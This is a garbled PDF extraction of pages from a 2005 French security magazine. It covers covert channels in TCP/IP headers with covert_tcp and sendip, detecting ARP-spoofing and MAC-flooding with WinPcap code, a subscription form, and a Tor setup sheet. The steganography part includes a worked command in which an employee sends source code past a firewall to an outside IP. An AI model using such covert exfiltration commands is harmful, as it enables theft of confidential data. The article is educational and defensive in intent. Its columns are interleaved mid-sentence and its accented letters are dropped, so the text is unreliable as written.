la diffrence de la mthode em-
ploye auparavant, un message
peut tre galement cach dans les
champs obligatoires de l'en-tte du
protocole. Il s'agit des champs qui
doivent toujours tre dfinis lors de la
transmission. Il en est ainsi grce la
prparation adquate de leurs valeurs. Figure 12. Transmission stganographique expditeur

hakin9 N o 4/2005 www.hakin9.org 63

 processus de fragmentation/
dfragmentation des paquets,
le champ Numro de squence
(en anglais Sequence Number)
dans le paquet TCP,
la champ Numro d'accus de
rception (en anglais Acknowled-
gment Number) dans le paquet
TCP.

L'application covert_tcp est dispo-

nible en tlchargement depuis la
page http://www.firstmonday.dk/
issues/issue2_5/rowland/index.html.
Pour la compiler sous Linux, tapez la
commande suivante :
Figure 13. Transmission stganographique destinataire
$ cc -o covert_tcp \
covert_tcp.c

Manipuler le champ
Identification dans le
datagramme IP
Cette mthode consiste remplacer
la valeur originale par la valeur ASCII
d'un caractre donn. Si l'une des
parties veut faire passer un message
donn via le port 80, par exemple
elle doit dmarrer le logiciel en ta-
pant la commande suivante :

Figure 14. Utiliser le champ Numro de squence expditeur

$ covert_tcp \
-source <IP de l'expditeur> \
-dest <IP du destinataire> \
-file <fichiers avec les donnes
envoyer>

Pour recevoir les donnes, l'autre

partie doit galement dmarrer l'ap-
plication covert_tcp mais en mode
serveur :

$ covert_tcp \
-source <IP de l'expditeur> \
-server \
-file <fichier avec les donnes
enregistrer>

Figure 15. Utiliser le champ Numro de squence destinataire

Science

Le ct expditeur est prsent sur

la Figure 9 et le ct destinataire
peut tre consult sur la Figure 10.
La situation o un employ mal-
Sur Internet
honnte vole le code d'un logiciel http://www.firstmonday.dk/issues/issue2_5/rowland/index.html Craig H. Rowland,
peut tre un exemple d'utilisation Covert channels in the TCP/IP Protocol Suite,
du texte cach dans l'en-tte du http://www.faqs.org/rfcs/rfc1180.html le rseau TCP/IP,
protocole. Admettons que l'employ http://www.faqs.org/rfcs/rfc2236.html le protocole IGMP.
se trouve derrire un firewall avec le

64 www.hakin9.org hakin9 N o 4/2005

 Stganographie rseau

port 80 ouvert (le rsultat du scanner
Nmap affichant les ports ouverts est
prsent sur la Figure 11).
Il peut alors taper (Figure 12) la
commande suivante sur un ordina-
teur de socit :
$ covert_tcp \
-dest 194.29.169.135 \
-dest_port 80 \
-seq -file code.c
le client doit confirmer la rcep-
tion du segment SYN en prove-
nance du serveur.
Dans ce cas, il est galement pos-
sible de remplacer la valeur origi-
nale du numro des donnes par la
valeur ASCII d'un caractre qui
vous intresse. Si l'une des parties
veut faire passer un certain mes-
sage du port source 20 au port
destination 20, par exemple elle
doit dmarrer l'application via la
commande suivante :

De mme, aprs tre rentr la mai-

son, il disposera d'un code appropri
dans un fichier spcifi condition
qu'il ait tap au pralable la com-
mande suivante sur son ordinateur
domestique (Figure 13) :

$ covert_tcp \
-source_port 80 \
-server -seq \
-file resultat.txt

Utiliser le champ Numro de

Figure 16. Schma de transmission utilisant le rebondissement ACK du
squence du segment TCP
protocole TCP
Le numro de squence initial ISN (en
anglais Initial Sequence Number) sert
assurer la fiabilit de la connexion
TCP/IP. Il est utilis dans le processus
de poigne de mains en trois phases
(en anglais three-way handshake) du
protocole TCP. Ce processus se d-
roule selon le scnario suivant :

un logiciel TCP du client envoie

un segment de donnes SYN (en
anglais synchronize) contenant
un numro de squence initial
que le client va envoyer lors de
cette connexion en rgle g- Figure 17. Utiliser le champ Numro d'accus de rception expditeur
nrale, ce segment SYN ne sert
pas envoyer les donnes mais
il contient seulement l'en-tte IP,
l'en-tte TCP et les ventuelles
options TCP,
le serveur doit confirmer la
rception du segment SYN en
provenance du client et envoyer
son propre segment SYN con-
tenant le numro de squence
initial ( savoir ISN+1) que le
serveur va envoyer lors de cette
connexion le serveur envoie
dans un segment SYN un accus
de rception ACK (en anglais ac-
knowledgment), Figure 18. Utiliser le champ Numro d'accus de rception destinataire

hakin9 N o 4/2005 www.hakin9.org 65

 $ covert_tcp \
-source <IP de l'expditeur> \ Cration manuelle des messages stganographiques
-dest <IP du destinataire> \ Pour crer un message stganographique, il est possible d'utiliser deux logiciels
-source_port 20 \ SendIP servant envoyer les paquets et tcpdump permettant d'intercepter le trafic
-dest_port 20 \ TCP. Admettons que nous voulions envoyer de faon secrte un message au con-
-seq \ tenu hakin9. Choisissons alors l'un des plusieurs algorithmes possibles nous allons
-file <fichiers avec les donnes> cacher le message dans le champ Identification du datagramme IP. Pour envoyer la
premire lettre du message, il faut taper la commande suivante :
Le destinataire doit galement d- # sendip -p ipv4 -ii 104 -p tcp -td 80 192.168.1.2
marrer l'application covert_tcp en
mode serveur : Ces drapeaux signifient que nous voulons utiliser les protocoles IPv4 et TCP (-p ipv4,
-p tcp) pour envoyer le paquet au port 80 (-td 80) de l'hte l'adresse 192.168.1.2.
$ covert_tcp \ La valeur du champ Identification est pourtant la plus importante 104 (-ii 104). Dans
-source_port 20 \ le code ASCII, ce nombre correspond la lettre h.
-server \
Pour envoyer tout le texte du message (hakin9), il faut rpter la procdure pour
les lettres suivantes en modifiant les valeurs du champ Identification : 104 pour la lettre
-seq \
h, 97 a, 107 k, 105 i, 110 n et 57 pour le chiffre 9. Le code ASCII complet est
-file <fichier enregistrer>
disponible la page http://www.neurophys.wisc.edu/www/comp/docs/ascii.html.
Pour lire le message, le destinataire doit dmarrer pralablement l'application
L'expditeur est prsent sur la tcpdump coutant sur le port 80 :
Figure 14 et le destinataire sur la
Figure 15. # tcpdump -vvv dst port 80

La valeur cache par l'expditeur se trouvera dans le champ id :

Utiliser le rebondissement du
numro d'accus de rception
du paquet TCP
Pour envoyer les donnes via un
canal cach, vous pouvez gale-
ment utiliser le rebondissement (en
anglais bounce) du numro d'accus
de rception (en anglais acknowled-
gment number). Dans cette m-
thode, l'expditeur envoie un paquet
contenant :
un faux numro IP de l'adresse
source,
un faux numro du port source,
un faux numro IP de l'adresse
destination,
un faux numro du port destina-
tion,
un segment SYN contenant les
donnes sous la forme code.
Pour consulter le schma de cette m-
thode, reportez-vous la Figure 16.
A est un client envoyant les donnes,
B un serveur qui rebondit les don-
Science
15:58:00.491516 192.168.1.1.0 > 192.168.1.2.http:
S [tcp sum ok] 3843951135:3843951135(0)
win 65535 (ttl 255, id 104, len 40)
dans le paquet, le serveur B dirige
la rponse avec les donnes codes
(comprises dans le segment SYN
incrment de 1) vers le serveur C.
Finalement, le serveur C reoit le pa-
quet et il dcode les donnes.
Grce cette mthode, il est pos-
sible d'envoyer les donnes un r-
seau scuris. Dans ce cas, on peut
admettre que le serveur C se trouve
sur le rseau protg, qu'il puisse
recevoir seulement les donnes en
provenance du serveur B et qu'il ne
puisse pas tablir la connexion au
client A. Si c'est le cas, l'expditeur
est oblig de dmarrer l'application
via la commande suivante :
$ covert_tcp \
-source <IP du destinataire> \
$ covert_tcp \
-source_port 1234 \
-server \
-ack \
-file <fichier enregistrer>
Le ct expditeur et destinataire sont
prsents sur les Figures 17 et 18.
Dfauts et problmes
Les protocoles de la famille TCP/IP
ont plusieurs faiblesses et leur uti-
lisation habile peut poser un gros
problme comme dans le cas, par
exemple d'une divulgation de dif-
frentes informations importantes
et confidentielles. La protection
contre ce type de danger est assez
difficile. Le filtrage des paquets
n'est efficace que dans le cadre

nes et C leur destinataire rel. -source_port 1234 \ de la premire mthode, de dissi-

Le client A envoie un faux paquet
avec une information code vers
le serveur B. Ce paquet comprend
une adresse du serveur C dans le
champ rserv l'adresse source.
Le serveur B rpond en envoyant
un segment SYN/RST ou SYN/ACK.
Voyant une fausse adresse source
-dest <IP du serveur rebondissant
les donnes> \
-seq \
-file <fichier avec les donnes>
Le destinataire doit galement d-
marrer l'application covert_tcp en
mode serveur :
mulation de donnes, dcrite, sa-
voir : la manipulation des champs
redondants dans les en-ttes de
protocoles. En ce qui concerne
la mthode des donnes caches
dans les champs obligatoires, cette
solution n'est pas suffisante. n

66 www.hakin9.org hakin9 N o 4/2005

 Dtection du sniffing
dans les rseaux
commuts
Daniel Kaczorowski, Maciej Szmit
C
ontrairement au concentrateur (hub),
le commutateur (switch) transfre
les trames seulement entre les ports
appropris ceux auxquels sont connects
respectivement l'expditeur et le destinataire
du message. Les dcisions concernant l'envoi
du message arrivant vers les ports appropris
sont prises partir de la table d'adresses
matrielles stocke dans la mmoire du com-
mutateur lies aux numros de ses ports.
Le commutateur pendant son fonctionnement
apprend ( partir de l'adresse de l'expditeur
se trouvant dans les trames qui y parviennent)
les adresses matrielles des priphriques
Fiche technique
connects aux ports spcifiques.
Vu ce mode de fonctionnement du commu-
tateur, les mthodes d'coute traditionnelles ne
peuvent pas tre exploites dans les rseaux
commuts les trames ne parviennent pas
aux autres utilisateurs. Deux autres mthodes
sont utilises : MAC-flooding et ARP-spoofing.
Chaque administrateur rencontrera, tt ou tard,
des pirates adolescents (de l'anglais script kid-
die,) qui tenteront d'intercepter le trafic rseau
l'aide de ces mthodes (cf. l'Encadr MAC-
flooding et ARP-spoofing). Mais cette coute
peut tre dtecte. Voyons comment le faire
68 www.hakin9.org
L'coute dans les rseaux
commuts est effectue
principalement l'aide de
deux mthodes : MAC-flooding
et ARP-spoofing. Pourtant
contrairement au sniffing
classique dans les rseaux
construits sur la base des
concentrateurs ces deux types
d'attaques sont des attaques
actives. La dtection n'est
gnralement pas facile, mais
possible.
nous allons commencer par un exemple plus
simple, c'est--dire MAC-flooding.
Attention inondation !
MAC-Flooding consiste inonder le rseau
par des trames avec des fausses adresses. En
gnral, ces trames sont envoyes par l'intrus
une adresse de diffusion ou une adresse qui
n'existe pas dans le rseau. Ces trames par-
viendront notre carte dans les deux cas que
l'attaque soit russie ou non (si l'assaillant les
adresse notre voisin, elles ne parviendront
notre machine qu'au cas o l'attaque sur le
commutateur a russi). Alors, si les trames
Cet article explique...
comment les intrus effectuent l'coute dans les
rseaux commuts,
comment dtecter le sniffing dans les systmes
Windows.
Ce qu'il faut savoir...
les notions de base de la programmation en C
pour Windows.
hakin9 N o 4/2005
 Dtection du sniffing

tor permet d'effectuer une simulation

MAC-flooding et ARP-spoofing de l'attaque de type MAC-flooding
Pendant quelque temps aprs la mise en marche ou la rinitialisation d'un commuta- chacun peut tester si les commuta-
teur, les trames sont envoyes vers tous les ports (de mme que dans le cas d'un con- teurs qu'il utilise sont vulnrables ce
centrateur). Ensuite, quand le commutateur aura mmoris tous les liens des adresses type d'agression. Pour pouvoir exploi-
physiques aux ports, les trames ne parviendront qu'au port li l'adresse approprie. ter cet outil, la bibliothque WinPcap
Quand nous branchons un priphrique sur un autre port, il ne recevra pas les trames doit tre installe (cf. l'Encadr Sur
jusqu' ce qu'il envoie une information au switch qui se rendra alors compte qu'il est Internet) sur le CD, vous trouve-
branch sur un autre port.
rez la version 3.0 de celle-ci. Pour
MAC-flooding consiste inonder le commutateur d'un grand nombre de trames
effectuer un test dtectant l'attaque,
ayant les adresses sources MAC inexistantes dans le rseau afin de saturer la m-
il faut choisir le sous-programme An-
moire destine l'affectation des adresses aux ports spcifiques. Le commutateur
inond commence se comporter comme un concentrateur ordinaire il envoie les tyMACflooding. La fentre principale
trames obtenues vers tous ses ports. Cette mthode n'est efficace que dans le cas du sous-programme est prsente
des commutateurs les moins chers, dans lesquels la mmoire destine rsoudre une sur la Figure 1.
adresse MAC en un numro de port est assez petite et commune tous les ports. Au dbut du test, il faut choisir la
ARP-spoofing est une mthode plus efficace car elle n'attaque pas le commuta- carte rseau (si l'ordinateur en pos-
teur, mais la victime qui envoie les informations une fausse adresse physique. Cette sde plusieurs) via laquelle l'analyse
attaque consiste se faire passer pour l'un des ordinateurs du rseau local (souvent, sera effectue. Pour ce faire, nous
pour des raisons videntes, pour une passerelle Internet) par l'envoi de fausses trames slectionnons l'un des champs de
ARP-Reply contenant les correspondances falsifies (c'est--dire l'affectation des
la liste contenant les identifiants de
adresses IP aux adresses MAC) indiquant que la nouvelle adresse MAC correspon-
toutes les interfaces rseaux dispo-
dant l'adresse IP est celle de la machine de l'assaillant. Ainsi, tout ce qui tait destin
nibles dans le systme. L'utilisateur
la passerelle est envoy vers l'intrus qui pour que l'attaque reste inaperue doit
envoyer les paquets reus la vraie passerelle. a aussi la possibilit de dterminer
L'attention est attire sur le fait que les correspondances ARP stockes dans la la dure de collection des donnes
mmoire cache (ARP-cache) du commutateur sont mises jour par le systme mme (c'est--dire des adresses physi-
dans le cas o ce dernier reoit un paquet ARP-reply. Cette situation a lieu mme si le ques MAC) partir des ordinateurs
commutateur n'a pas envoy de requte ARP-request. Cela facilite beaucoup la tche prsents dans le rseau et le temps
aux pirates. d'analyse des trames rceptionnes
par la carte la dure de test plus
longue amliore la prcision de
rceptionnes par notre carte ont pas destine, nous pouvons sup- l'outil.
l'adresse d'un expditeur qui n'existe poser que notre commutateur est Une fois les informations sur les
pas dans notre rseau, cela signi- inond, ce qui veut dire que nous adresses physiques collectes, le
fie que quelqu'un essaie d'inonder avons faire une attaque russie programme commence intercepter
(en anglais flood) le commutateur. de type MAC-Flooding. et analyser les trames entrantes.
Il ne nous reste qu'a vrifier quelles Pour dtecter une attaque effec- Aprs le temps dtermin prc-
adresses MAC sont rellement pr- tue par la mthode MAC-flooding, demment, il affiche les statistiques.
sentes dans notre rseau. il faut analyser toutes les trames qui Les trames rceptionnes sont ran-
Il se peut qu'une trame adres- parviennent notre carte rseau. gs en groupes appropris :
se un ordinateur inconnu par le Au rseau commut, qui n'est pas
commutateur apparaisse dans ce l'objectif des attaques, arrivent les les trames de diffusion (broad-
cas, le commutateur se comporte trames de diffusion (broadcast), cast),
comme un concentrateur ordinaire de groupe (multicast) et les trames les trames de groupe (multicast),
et envoie cette trame tous ses adresses notre machine. L'ad- les trames adresses une carte
ports. Une telle situation ne doit pas ministrateur doit prparer une liste rseau concrte,
avoir lieu avant d'envoyer une tra- des adresses physiques des ordi- les trames adresses aux autres
me un ordinateur, il faut demander nateurs dans son rseau, ou utiliser utilisateurs.
son adresse physique (dans le cas un programme spcial demandant
des piles TCP/IP l'aide de d'une ( l'aide du protocole ARP) toutes Les trames ayant une adresse phy-
requte de diffusion ARP-request), les adresses IP du rseau local leurs sique qui n'appartient aucun ordi-
et celui-ci rpond par la trame ARP- adresses physiques, et ensuite, ana- nateur trouv dans le rseau (celles
reply approprie partir de laquelle lyser le trafic parvenant sa carte. qui sont suspectes d'avoir pour
le commutateur dduit la localisation Pour dtecter MAC-flooding, nous but d'inonder le commutateur) sont
de l'ordinateur portant cette adresse allons utiliser le programme MACMa- mises en vidence (couleur rouge).
MAC. Donc, si notre interface rseau nipulator (disponible sur le CD joint au Le programme n'avertit pas l'utilisa-
reoit une trame (et pire encore magazine), un outil gratuit pour l'envi- teur, mais les statistiques peuvent
plusieurs trames) qui ne nous est ronnement Windows. MACManipula- tre trs inquitantes (comme celle

hakin9 N o 4/2005 www.hakin9.org 69


Figure 1. La fentre principale du sous-programme AntyMACflooding
Fiche technique
Figure 2. Le rsultat de l'analyse du programme AntyMACflooding
sur la Figure 2) environ la moiti
des trames interceptes ont t en-
voyes partir d'adresses physiques
MAC inconnues.
Bien sr, il peut arriver que
pendant l'coute, de nouveaux or-
dinateurs se sont joints au rseau,
ou bien il existe des machines uti-
lisant une autre pile de protocoles
par exemple IPX/SPX, qui n'ont
pas rpondu aux requtes ARP
70
et envoient des trames inconnues
ne pouvant pas tre identifies par
notre programme. Mais c'est un outil
pour les administrateurs qui, quand
Sur Internet
http://www.kis.p.lodz.pl/~mszmit/zasoby.html le paquet d'outils pour le sniffing,
http://winpcap.polito.it/install/default.htm la bibliothque WinPcap.
www.hakin9.org
mme, doivent savoir tout sur leurs
rseaux.
MAC-flooding est une technique
trs facile dtecter. Quant ARP-
spoofing ce type d'attaque est
un peu plus complique et nces-
site d'autres mthodes de dtection.
Voyons comment dtecter cette
attaque dans un rseau bas sur les
systmes Windows.
Quand deux disent
tre le mme
ARP-spoofing
L'attaque ARP-spoofing est une
attaque trs efficace et cela pas
seulement dans le cas de commu-
tateurs (cf. l'Encadr MAC-flooding
et ARP-spoofing). Elle contraint
la victime envoyer ses donnes
l o celles-ci ne devraient jamais
parvenir mme si le rseau est
commut et indpendamment du
nombre du priphriques rseau tra-
verss. De plus, les concepteurs du
systme d'exploitation Windows, ont
implment ARP de faon rendre
l'attaque plus facile :
chaque rponse ARP-reply arri-
vant change les inscriptions dans
la table locale ARP (peu importe
si l'ordinateur auquel celle-ci par-
vient le demandait),
mme les inscriptions effectues
dans la table de correspondan-
ces ARP (ARP-cache) manuelle-
ment par l'administrateur restent
statiques jusqu'au moment o un
paquet ARP-reply apparat.
Admettons que nous disposons de
la liste des adresses physiques dans
notre rseau, mais nous n'avons pas
de temps pour vrifier si l'une d'elles
n'a pas chang (le programme sous
Linux arpwatch ou un systme de
dtection des intrus appropri peu-
vent le faire pour nous). L'unique
hakin9 N o 4/2005
 Dtection du sniffing

chose que nous pouvons faire est

de demander tous les ordinateurs
de notre rseau leurs adresses MAC
et vrifier si l'une des requtes
deux rponses sont arrives. Bien
sr, si le pirate se faisant passer
pour l'un des priphriques l'arrte
(p. ex. l'aide d'une attaque DoS ou
physiquement en coupant l'alimen-
tation), l'attaque ne pourra pas tre
dtecte.
Pour effectuer l'analyse, utilisons
ARPanalyzer, l'outil gratuit pour Win-
dows (disponible aussi sur le CD
joint au magazine). ARPanalyzer
effectue galement la simulation
des attaques de type ARP-spoofing
(il est impossible de l'utiliser dans la
pratique ; pour ce faire, il est d'ha-
bitude ncessaire de rediriger les
trames interceptes vers le vrai des-
tinataire). La fentre principal du pro-
gramme ARPanalyzer est prsente
sur la Figure 3.
La vrification des rseaux LAN
afin de dtecter les utilisateurs se
faisant passer pour d'autres utilisa-
Figure 3. La fentre principale du programme ARPanalyzer
teurs peut tre effectue dans le
programme ARPanalyzer l'aide de
trois tests.
Le premier d'entre eux quiz
from my address consiste effec-
tuer la requte ( travers le protocole
ARP) sur l'adresse physique l'aide
de notre propre adresse MAC. L'at-
taque sera dtecte, si l'assaillant a
choisi notre ordinateur pour victime.
Dans ce cas, nous essayons de
demander (en nous servant de notre
propre adresse en tant qu'adresse
de l'expditeur), par exemple,
l'adresse de la passerelle Internet
et nous attendons l'arrive des r-
ponses s'il y en a plus d'une, l'atta-
que ARP-spoofing a eu lieu.
Le deuxime profite du fait que
d'habitude l'intrus ne choisit pas
comme objectif de l'attaque l'or-
dinateur de l'administrateur. C'est
pourquoi, une bonne ide est de se
faire passer pour une victime poten-
tielle de l'attaque (l'option d'ARPs-
poofing), cela veut dire, de falsifier
notre propre requte ARP-request.
videmment, le commutateur (
moins que nous ayons un rseau
commut) apprendra trs vite que Figure 4. Le rsultat de l'excution du programme ARPanalyzer

hakin9 N o 4/2005 www.hakin9.org 71

 c'est notre port qu'il faut adresser
tout le trafic destin la victime.
la suite de cette manipulation, la
victime sera dconnecte du rseau
naturellement, seulement jusqu'au
moment o celle-ci enverra dans le
rseau quelque chose qui permettra
au commutateur de mmoriser sa
localisation. Dans le pire des cas
(quand la victime effectue une trans-
mission importante des donnes),
il peut arriver que la fausse rponse
de l'assaillant que nous avons pro-
voque ne parvienne pas notre
ordinateur, mais la vraie victime.
Il n'existe pas de mthode simple
pour y remdier, mais la plus efficace
consiste dbrancher la victime po-
tentielle du rseau pendant les tests.
Il est prfrable de le faire (le test
ne dure que quelques secondes, et
l'utilisateur ne s'en apercevra mme
pas), si non, nous pouvons nous at-
tendre un coup de tlphone de la
part d'un utilisateur inquiet par une
information disant que le Systme a
dtect un conflit d'adresses.
Par contre, si nous ne savons pas
qui et pour quel ordinateur il faut se
faire passer, l'unique possibilit est
de demander tout le rseau sur notre
propre adresse (demande de rsou-
dre toutes les adresses IP du rseau
local entier).
Aprs avoir dmarr le program-
me et choisi la carte rseau exa-
miner, cliquez sur le bouton Check.
Comme rsultat de chaque test, on
obtient un message informant sur
le nombre de rponses obtenues
notre requte.
Si le rsultat ressemble ce-
lui prsent sur la Figure 4, nous
pouvons tre srs que notre rseau
Fiche technique
a t attaqu par un intrus. Si le pro-
gramme n'annonce aucune rponse
double, il est probable que notre
rseau est protg. Mais il se peut
que l'intrus exploite une technique
que nous ne sommes pas capables
de dtecter.
Conclusion
Il est plus difficile de dtecter les
tentatives de sniffing dans les sys-
tmes Windows que dans les syst-
mes de la famille *NIX. moins que
72
Usage de la bibliothque WinPcap pour recevoir
et envoyer les trames ethernet
La bibliothque WinPcap permet l'analyse des donnes rceptionnes via la
carte rseau. C'est une bibliothque gratuite pour l'environnement Windows, cre
l'cole Polytechnique de Turin (Italie). Elle offre des fonctionnalits similaires
celles disponibles dans la bibliothque libpcap sous *NIX. Elle est indispensable
pour faire fonctionner le paquet d'outils prsent dans l'article. Comment l'auteur
l'a-t-il utilise pour crer les outils ? Comment pouvons-nous l'exploiter dans notre
propre programme pour l'analyse du trafic rseau ?
Au dbut, il faut dclarer les structures correspondant aux en-ttes appropris
des protocoles. Ces structures permettent de se rfrer aux champs appropris de
l'en-tte. La structure ip _ address (Listing 1) correspond l'adresse IP, la struc-
ture hw _ address (Listing 2) correspond l'adresse physique MAC, et arp _ header
(Listing 3) est une structure qui reflte les champs spcifiques de l'en-tte du pro-
tocole ARP.
Avant d'appeler les fonctions, il faut dclarer les variables appropries. Ces
variables serviront stocker les pointeurs vers certaines ressources rseau
(cf. le Listing 4).
Dans l'tape suivante, il faut tlcharger les identifiants de toutes les cartes
rseau disponibles qui se trouvent dans le systme :
if (pcap_findalldevs(&alldevs, errbuf) == -1)
{ //erreur }
Ensuite, il faut choisir une interface rseau. Pour ce faire, nous pouvons utiliser la
structure suivante (inum doit tre compris dans l'intervalle des nombres des cartes
disponibles) :
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
Grce cela, les donnes reues et analyses proviendront de la mme carte rseau.
La passage de la carte rseau en mode gnral nous permettra l'accs aux don-
nes sur chaque couche elle est ralise l'aide de la fonction pcap _ open _ live.
Pendant l'appel de la fonction ci-dessus, il faut prter l'attention la taille maximale des
donnes. Au cas o l'on rceptionne des donnes, cette taille doit tre gale la valeur
maximale des donnes possible envoyer travers le rseau, par contre, pour l'envoi,
la taille des donnes doit correspondre la taille des donnes envoyer. L'appel de la
fonction pcap _ open _ live est prsent dans le Listing 5.
La dfinition d'un filtre permet de slectionner les donnes rceptionnes. Grce
cela, ne seront envoyes aux couches suprieurs que les donnes qui correspondent
aux critres dtermins. Dans notre cas, ce sont les paquets ARP (cf. le Listing 6).
L'coute des trames est ralise dans une boucle. La dfinition du filtrage
nous garantit que seuls les paquets ARP seront reus. L'affectation de la structure
arp _ header aux donnes rceptionnes (pkt _ data) permettra de se rfrer aux
champs spcifiques de l'en-tte (Listing 7). La situation sera diffrente, si nous vou-
lons envoyer les donnes l'aide du programme cr. Dans ce cas, il faut crer une
structure approprie (dans ce cas, ce sera une trame ethernet).
u_char packet[100]; //table correspondant la trame entire
Les lignes successives du code rempliront les octets de la trame dclare. Les six
premiers octets correspondent l'adresse MAC physique du destinataire de la trame,
et les six suivants l'adresse MAC de l'expditeur (cf. le Listing 8).
Enfin, il faut remplir les autres octets de la trame. Au moyen de la fonction
pcap _ sendpacket, nous envoyons la trame toute prte via la carte rseau choisie
prcdemment :
for(i=12;i<100;i++)
{ packet[i]=i%256; }
pcap_sendpacket(fp, packet, 100);
www.hakin9.org hakin9 N o 4/2005
 Dtection du sniffing

Listing 1. La structure Listing 6. Le filtre responsable de la slection des donnes rseau

ip _address
if(d->addresses != NULL) {
typedef struct ip_address netmask=((struct sockaddr_in *)(d->addresses->netmask))
{ ->sin_addr.S_un.S_addr;
u_char byte1; } else {
u_char byte2; netmask=0xffffff;
u_char byte3; }
u_char byte4; if(pcap_compile(adhandle, &fcode, filter, 1, netmask) <0 ) {
}ip_address; //erreur
}
if(pcap_setfilter(adhandle, &fcode)<0) {
//erreur
Listing 2. La structure }

hw_address

typedef struct hw_address

Listing 7. L'affectation de la structure arp _entte aux donnes reues
{
u_char byte1; arp_header *headerARP;
u_char byte2; while((res = pcap_next_ex( adhandle, &header, &pkt_data)) >= 0) {
u_char byte3; if(res == 0)
u_char byte4; continue; //au cas o le temps de retard est dpass
u_char byte5; arpRequest=(arp_header*)(pkt_data+14);
u_char byte6; //dans la partie suivante, on se rfre aux champs de la structure arp_header
}hw_address; }

Listing 3. La structure arp _header Linux possde des outils standards

permettant d'envoyer et de mani-
typedef struct arp_header{ puler les paquets, les produits de
u_short t_hardware; //hardware type
Microsoft ne sont pas dots d'une
u_short t_protocol; //protocol type
u_char h_len; //hardware address length telle fonctionnalit. Pour y remdier,
u_char p_len; //protocol address length nous pouvons utiliser la bibliothque
u_short option; //operation WinPcap, correspondant au paquet
hw_address s_mac; //Sender hardware address libpcap sous *NIX (cf. l'Encadr Usa-
ip_address saddr; //Sender protocol address
ge de la bibliothque WinPcap pour
hw_address d_mac; //Target hardware address
ip_address daddr; //Target protocol address recevoir et envoyer les trames ether-
}arp_header; net). Elle a t utilise par l'auteur de
cet article pour crer le jeu d'outils
prsent, qui sera fort utile chaque
Listing 4. La dclaration des variables administrateur des rseaux bass
sur Microsoft Windows voulant con-
pcap_if_t *alldevs; //pointeur vers la liste contenant cevoir ses propres applications pour
//les identifiants de toutes les cartes
manipuler les paquets rseau. n
//dans le systme
pcap_if_t *d; //pointeur vers la carte rseau choisie
pcap_t *adhandle; //pointeur vers la carte ouverte Listing 8. Le code responsable
char errbuf[PCAP_ERRBUF_SIZE]; //tampon identifiant les erreurs produites
des adresses MAC
char filter[] = "arp"; //nom des trames filtres
packet[0]=1;
packet[1]=1;
packet[2]=1;
Listing 5. L'appel de la fonction pcap _open_live
packet[3]=1;
packet[4]=1;
if ( (adhandle= pcap_open_live(d->name, //nom de la carte rseau
packet[5]=1;
65536, //taille maximale
//des donnes rceptionnes
packet[6]=2;
//(y compris l'en-tte de la trame)
packet[7]=2;
1, //mode gnral
packet[8]=2;
1000, //valeur du retard de lecture des donnes
packet[9]=2;
errbuf // pointeur vers le tampon de l'erreur
packet[10]=2;
) ) == NULL)
packet[11]=2;
{ //erreur }

hakin9 N o 4/2005 www.hakin9.org 73

 www.shop.software.com.pl/fr

Abonnez-vous vos magazines prfrs

et commandez des anciens numros !

Vous pouvez en quelques minutes et en toute scurit vous abonner votre magazine prfr.
Nous vous garantissons :
des tarifs prfrentiels,
un paiement en ligne scuris,
la prise en compte rapide de votre commande.
Abonnement en ligne scuris tous les magazines de la maison ddition Software !
bulletin dabonnement
Merci de remplir ce bon de commande et de nous le retourner par fax : 0048 22 860 17 71 ou par courrier :
Software-Wydawnictwo Sp. z o.o., Lewartowskiego 6, 00-190 Varsovie, Pologne ; Tl. 0048 22 860 17 68 ;
E-mail : abonnement@software.com.pl

Prnom Nom ............................................................................................... Entreprise ...................................................................................................

Adresse .................................................................................................................................................................................................................................

Code postal ................................................................................................ Ville ..............................................................................................................

Tlphone ................................................................................................... Fax ...............................................................................................................

Je souhaite recevoir l'abonnement partir du numro .....................................................................................................................................................

E-mail (indispendable pour envoyer la facture) .................................................................................................................................................................

o Prolongement automatique dabonnement

Nombre de Nombre

Titre
partir du
numros dabonne- Prix
numro
annuels ments
Software Developers Journal (1 CD)
anciennement Software 2.0 12 54
Mensuel pour les programmeurs professionnels
Software Developers Journal Extra! (1 CD)
anciennement Software 2.0 Extra! 6 38
Hors-srie du magazine Software Developers Journal

Linux+DVD (2 DVDs) 12 86
Mensuel unique avec 2 DVDs consacr Linux et ses utilisateurs

Collection Linux+ Distributions (4-7 CDs ou 2 DVDs) 6 50

Distributions Linux les plus populaires

PHP Solutions (1 CD) 6 38

Le plus grand magazine sur PHP au monde
Hakin9 comment se dfendre ? (1 CD)
Bimestriel destin aux personnes qui sintressent la scurit des 6 38
systmes informatiques

Aurox Linux (3 DVDs) 4 38

Trimestriel avec distribution Linux complte

.PSD (2 CDs) 6 39
Bimestriel pour les utilisateurs dAdobe Photoshop

Total

Je rgle par :
Carte bancaire n CB expire le date et signature obligatoires
type de carte .......................................................................... code CVC/CVV
Virement bancaire :
Nom banque : Socit Gnrale Chasse/Rhne
banque guichet numro de compte cl Rib
30003 01353 00028010183 90
IBAN : FR76 30003 01353 00028010183 90
Adresse Swift (Code BIC) : SOGEFRPP
 Tor
Systme : Windows, MacOS X, *NIX
Licence : Base sur la licence BSD
But : Proxy SOCKS anonyme
Fiche technique
Page d'accueil : http://tor.eff.org/

Le proxy anonyme fonctionnant sur le principe du rseau distribu. Il permet

toutes les applications qui possdent SOCKS4 d'tablir des connexions
anonymes, slectionnes de faon alatoire dans le rseau de relais. Il est
galement possible de dmarrer notre propre relais.

Dmarrage rapide Windows : Admettons que nous SocksPolicy accept 192.168.1.0/24

voulons pouvoir nous connecter anonymement des
pages Web partir du systme Windows XP.
Lors de l'installation de Tor, il est recommand de
cocher l'option Run at startup, pour que le logiciel soit lanc
au dmarrage du systme. Aprs l'installation, le client Tor
est dmarr et la fentre de la console est ouverte (il ne faut
pas la fermer). Une fois lanc, Tor accepte les connexions
SOCKS4 sur le port 9050. Nanmoins, pour se connecter
aux pages Web de faon tout fait anonyme (les requtes
DNS ne passent pas par SOCKS4), il est prfrable d'ins-
taller Privoxy. Privoxy peut tre tlcharg partir de la suivante :
page http://www.privoxy.org. Aprs l'installation et le lance-
ment, l'icne du programme s'affiche dans le system tray.
Cliquez sur cette icne avec le bouton droit de la souris
et slectionnez l'option Edit->Main Configuration. Dans le
fichier de configuration ajoutez la ligne :
forward-socks4a / localhost:9050 .
Ensuite, sauvegardez le fichier et fermez la fentre.
partir de ce moment, Privoxy transfre toutes les
connexions vers Tor. Maintenant il suffit de configurer le
proxy pour qu'il se connecte via localhost sur le port 8118.
Ensuite, allez la page http://ipid.shat.net/ et vrifiez si
l'adresse IP affiche est la vtre. Si ce n'est pas le cas,
cela signifie que Tor fonctionne correctement.
